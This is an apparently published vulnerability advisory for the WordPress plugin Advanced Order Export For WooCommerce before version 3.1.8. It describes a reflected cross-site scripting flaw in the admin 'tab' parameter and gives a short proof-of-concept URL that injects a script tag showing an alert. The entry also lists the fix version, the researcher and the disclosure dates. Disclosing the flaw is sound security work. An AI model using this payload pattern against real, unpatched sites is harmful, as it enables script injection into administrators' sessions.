Advanced Order Export For WooCommerce < 3.1.8 - Reflected Cross-Site Scripting (XSS)
Description
This plugin helps you to easily export WooCommerce order data. The tab parameter in the Admin Panel is vulnerable to reflected XSS.
Proof of Concept
wp-admin/admin.php?page=wc-order-export&tab=</script><script>alert(/XSS/)</script>
Affects Plugins
Fixed in version 3.1.8✓
Classification
Miscellaneous
Original Researcher
0xB9
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2021-03-03 (about 2 months ago)
Added
2021-03-03 (about 2 months ago)
Last Updated
2021-05-07 (about 20 hours ago)